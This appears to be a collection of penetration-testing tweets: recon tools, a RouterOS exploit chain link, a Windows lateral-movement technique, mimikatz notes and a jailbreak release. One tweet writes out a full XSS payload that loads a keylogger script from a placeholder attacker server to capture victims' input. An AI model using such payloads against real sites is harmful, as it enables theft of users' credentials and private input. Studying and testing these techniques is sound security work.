Pentester
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, ThreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
getallurls - fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl:
https://t.co/34znlumYwM

Quick script that I use religiously for content discovery.
So this filing in security research company CorelliumHQ vs Apple has some pretty interesting details. And it doesn't exactly look good for Apple. https://t.co/KNl2z3Uk8l
RouterOS : Chain to Root - DNS Request to a Root Busybox Shell : https://t.co/eDqnIDHKdV

Bug Hunting in RouterOS : https://t.co/FqxamHNdUs (Slides)

PoC : https://t.co/IsCXSysp8j
Arjun : HTTP parameter discovery suite (Typical scan takes 30 sec with huge list of 25,980 param' names) : https://t.co/L14G2peGuW
WEIZZ: Automatic Grey-box Fuzzing for Structured Binary Formats
Target has an android app?

1. Download it
2. Use Diggy (https://t.co/qp3LIHZRge) to extract URLs
3. Use Arjun (https://t.co/Y02eaYsbow) to find parameters on those URLs
Remote XSS Keylogger:

Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>

This will log a user's input to your remote server.

keylogger.php: https://t.co/PwIvyt9Uss

keylogger.js: https://t.co/g5HoTeA5z2
Interesting way to move laterally using the service manager without registering a service or writing a file to disk.

C# and PowerShell versions will be released soon.

https://t.co/ZGA78JFJxQ

Thanks to ChangeServiceConfigA
Happy to see more usages of Credential Guard protection in Windows 10 (enterprise/business), with persistence across reboots. #mimikatz

* BCryptIsoKeyData for CNG private keys ;
* Credential for domain_password credentials ;
* LsaIsoAsymmetricKeyBlob for MachineBoundCertificate.
#checkra1n beta 0.9.3 is out with significant improvements - get it at https://t.co/MqMSSonazH